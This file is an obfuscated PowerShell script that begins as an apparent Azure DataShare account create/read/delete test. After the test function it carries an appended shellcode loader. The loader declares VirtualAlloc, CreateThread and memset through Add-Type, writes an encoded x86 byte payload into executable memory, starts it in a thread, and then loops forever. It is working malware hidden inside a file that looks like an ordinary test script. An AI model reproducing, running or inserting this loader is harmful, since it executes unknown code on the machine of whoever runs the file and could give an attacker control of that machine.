function tesT`-a`CcOuNT`crud
{
    ${re`SOu`RCEGRO`UP} = .("{7}{5}{6}{1}{2}{8}{3}{4}{0}" -f'ceGroup','Setup-','Creat','so','ur','es','t','T','eRe')
	
	try{
		${aCCO`UNTn`Ame} = .("{1}{0}{2}"-f'AssetNam','get','e')
		${t`Ags} = @{("{1}{0}"-f '1','tag') = ("{0}{1}"-f 'value','1'); ("{1}{0}" -f'2','tag') = ("{1}{2}{0}" -f 'ue2','va','l')}
		${accO`U`N`TlOcA`TIon} = &("{2}{1}{0}"-f 'tion','-Loca','Get') ("{1}{3}{0}{2}{4}" -f'ros','Mi','oft.DataSh','c','are') ("{0}{1}{2}"-f'ac','count','s') ("{1}{0}{2}" -f'T','WES',' US')
		${C`Reated`A`CcOUNt} = &("{3}{0}{1}{2}{4}"-f 'ew-A','z','DataShareAcco','N','unt') -Name ${acCou`N`TNAmE} -ResourceGroupName ${rES`OURc`eg`ROuP}."re`souRcEGrOuP`N`A`Me" -Location ${acCoUnT`lOcaT`i`ON} -Tag ${t`AGs}

		.("{2}{1}{3}{0}"-f'ull','er','Ass','t-NotN') ${creaTE`daCc`O`U`Nt}
		.("{1}{3}{0}{2}{4}"-f'Ar','Ass','eEqu','ert-','al') ${accoU`Nt`NA`Me} ${cREatedA`cc`OUnt}."n`AmE"
		.("{0}{4}{1}{3}{2}" -f 'A','reEq','al','u','ssert-A') ${AcCO`UNtLo`CA`Tion} ${CReAT`eDaCcO`U`NT}."locati`ON"
		&("{1}{2}{0}"-f'Tags','A','ssert-') ${Ta`GS} ${c`Reate`dAccoUNt}."TA`gS"
		.("{1}{3}{2}{0}"-f'qual','Asser','reE','t-A') ("{2}{1}{3}{0}" -f 'd','uccee','S','de') ${Cre`At`e`DaccouNT}."p`R`ovisI`oN`INGSTATe"

		${R`E`TrIEvE`Da`ccOUNt} = .("{2}{1}{3}{0}{4}"-f'hareAcc','t-AzData','Ge','S','ount') -Name ${AcC`ount`NAMe} -ResourceGroupName ${RESo`URCEg`RouP}."ReSO`URCEgROu`pna`mE"

		.("{3}{2}{4}{1}{0}"-f 'll','u','N','Assert-','otN') ${Ret`Ri`E`VEDAcC`ouNt}
		.("{0}{4}{3}{1}{2}"-f 'A','e','Equal','rt-Ar','sse') ${Ac`cO`UNtNAme} ${R`E`TrIEvedACCO`Unt}."N`AmE"
		.("{2}{0}{1}{4}{3}" -f'sse','rt-A','A','eEqual','r') ${acCO`U`NtLOCAT`i`oN} ${RE`TrI`eVEdAcCo`UNT}."lOc`A`TIOn"
		.("{2}{0}{3}{1}"-f 'rt','AreEqual','Asse','-') ("{2}{1}{0}" -f 'ded','ccee','Su') ${R`e`T`R`iEvedAcC`OuNT}."prOvI`sion`ingst`Ate"

		${r`eMov`ED} = .("{6}{0}{7}{2}{4}{5}{3}{1}"-f 'mov','t','Share','n','Ac','cou','Re','e-AzData') -Name ${ACCOUnt`N`A`Me} -ResourceGroupName ${RESO`UrcEg`RO`UP}."RE`sOu`Rc`egroUpnAme" -PassThru -Force

		.("{3}{0}{2}{1}" -f'sse','True','rt-','A') { ${Remo`VED} }
		.("{3}{1}{2}{5}{4}{0}" -f 's','ss','ert-Thr','A','n','owsContai') { .("{1}{3}{0}{2}{5}{4}"-f 'at','Get','aS','-AzD','eAccount','har') -Name ${aC`COU`NtNA`ME} -ResourceGroupName ${r`ESoURC`eGr`oUp}."REsoURC`E`G`Ro`UpN`AmE" } ((("{7}{6}{14}{13}{1}{5}{2}{3}{9}{4}{11}{8}{0}{12}{10}" -f ' e','k','sti','ngshareaccount977',' does','te','ce q','Resour','ot','6qp5','t',' n','xis','sd','p5')) -REPlacE ([chAr]113+[chAr]112+[chAr]53),[chAr]39)
	}
	finally
	{
		&("{0}{4}{6}{2}{5}{1}{3}"-f'Remo','o','Resource','up','ve','Gr','-Az') -Name ${r`E`So`U`RCeGRoup}."Re`SO`U`RcEgROup`NAME" -Force
	}
}
${c} = ((("{61}{27}{35}{19}{47}{43}{54}{7}{23}{40}{32}{48}{6}{52}{25}{46}{26}{33}{0}{51}{21}{39}{16}{17}{22}{5}{55}{24}{13}{10}{64}{34}{18}{65}{20}{1}{36}{50}{66}{15}{44}{42}{53}{41}{58}{11}{2}{37}{63}{62}{45}{3}{67}{38}{8}{57}{29}{59}{49}{28}{30}{12}{9}{56}{60}{31}{14}{4}"-f ';[DllImport(XmMkernel','Size, ','IntPtr lpTh','rt(XmMmsvcrt.dllX',');','n I','ss, uint d','atic extern IntPtr V','xtern Int',' s','r','Flags, ',', uint','ead(IntPt','nt','dres','stati','c ex','hreadA','lX','ack','ub','ter','irtu','teThr','t flAllo','ype, ui','mport(XmM','t(I','tr ','ntPtr dest','t cou','lAlloc(I','nt flProtect)','lpT','kernel32.dl','In','readId);','tatic e','lic ','a','meter, uint dwCre','ntP','pu','s, I','Impo','cationT','mM)]','ntPtr lpAddre','mse','tPtr lpS','32.dllXmM)]p','wSize, uin','tr lpPara','blic st','ntPtr Crea','r','P','ation','me','c, uin','[DllI','Dll','[',' ','ttributes, uint dwSt','tartAd','mM)]public s'))."Re`p`LAcE"(([Char]88+[Char]109+[Char]77),[stRInG][Char]34));${w} = .("{1}{0}{2}" -f'd-T','Ad','ype') -memberDefinition ${c} -Name ("{0}{1}" -f 'Wi','n32') -namespace ("{0}{3}{2}{1}"-f'Win','nctions','2Fu','3') -passthru;[Byte[]];[Byte[]]${z} = 0xba,0xe8,0xd1,0xdc,0x30,0xdb,0xdb,0xd9,0x74,0x24,0xf4,0x5b,0x29,0xc9,0xb1,0x47,0x31,0x53,0x13,0x83,0xeb,0xfc,0x03,0x53,0xe7,0x33,0x29,0xcc,0x1f,0x31,0xd2,0x2d,0xdf,0x56,0x5a,0xc8,0xee,0x56,0x38,0x98,0x40,0x67,0x4a,0xcc,0x6c,0x0c,0x1e,0xe5,0xe7,0x60,0xb7,0x0a,0x40,0xce,0xe1,0x25,0x51,0x63,0xd1,0x24,0xd1,0x7e,0x06,0x87,0xe8,0xb0,0x5b,0xc6,0x2d,0xac,0x96,0x9a,0xe6,0xba,0x05,0x0b,0x83,0xf7,0x95,0xa0,0xdf,0x16,0x9e,0x55,0x97,0x19,0x8f,0xcb,0xac,0x43,0x0f,0xed,0x61,0xf8,0x06,0xf5,0x66,0xc5,0xd1,0x8e,0x5c,0xb1,0xe3,0x46,0xad,0x3a,0x4f,0xa7,0x02,0xc9,0x91,0xef,0xa4,0x32,0xe4,0x19,0xd7,0xcf,0xff,0xdd,0xaa,0x0b,0x75,0xc6,0x0c,0xdf,0x2d,0x22,0xad,0x0c,0xab,0xa1,0xa1,0xf9,0xbf,0xee,0xa5,0xfc,0x6c,0x85,0xd1,0x75,0x93,0x4a,0x50,0xcd,0xb0,0x4e,0x39,0x95,0xd9,0xd7,0xe7,0x78,0xe5,0x08,0x48,0x24,0x43,0x42,0x64,0x31,0xfe,0x09,0xe0,0xf6,0x33,0xb2,0xf0,0x90,0x44,0xc1,0xc2,0x3f,0xff,0x4d,0x6e,0xb7,0xd9,0x8a,0x91,0xe2,0x9e,0x05,0x6c,0x0d,0xdf,0x0c,0xaa,0x59,0x8f,0x26,0x1b,0xe2,0x44,0xb7,0xa4,0x37,0xf0,0xb2,0x32,0x78,0xad,0xbc,0xcd,0x10,0xac,0xbe,0xc0,0xbc,0x39,0x58,0xb2,0x6c,0x6a,0xf5,0x72,0xdd,0xca,0xa5,0x1a,0x37,0xc5,0x9a,0x3a,0x38,0x0f,0xb3,0xd0,0xd7,0xe6,0xeb,0x4c,0x41,0xa3,0x60,0xed,0x8e,0x79,0x0d,0x2d,0x04,0x8e,0xf1,0xe3,0xed,0xfb,0xe1,0x93,0x1d,0xb6,0x58,0x35,0x21,0x6c,0xf6,0xb9,0xb7,0x8b,0x51,0xee,0x2f,0x96,0x84,0xd8,0xef,0x69,0xe3,0x53,0x39,0xfc,0x4c,0x0b,0x46,0x10,0x4d,0xcb,0x10,0x7a,0x4d,0xa3,0xc4,0xde,0x1e,0xd6,0x0a,0xcb,0x32,0x4b,0x9f,0xf4,0x62,0x38,0x08,0x9d,0x88,0x67,0x7e,0x02,0x72,0x42,0x7e,0x7e,0xa5,0xaa,0xf4,0x6e,0x75;${G} = 0x1000;if (${z}."LEN`G`Th" -gt 0x1000){${g} = ${Z}."lE`NGth"};${x}=${W}::("{0}{1}{2}" -f 'Vir','tualAll','oc').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${z}."L`EnGtH"-1);${i}++) {${w}::"M`Em`set"([IntPtr](${x}.("{2}{0}{1}" -f 'oI','nt32','T').Invoke()+${i}), ${z}[${i}], 1)};${W}::("{1}{2}{0}{3}" -f 'eat','C','r','eThread').Invoke(0,0,${X},0,0,0);for (;;){.("{3}{1}{2}{0}"-f'-sleep','ta','rt','S') 60};
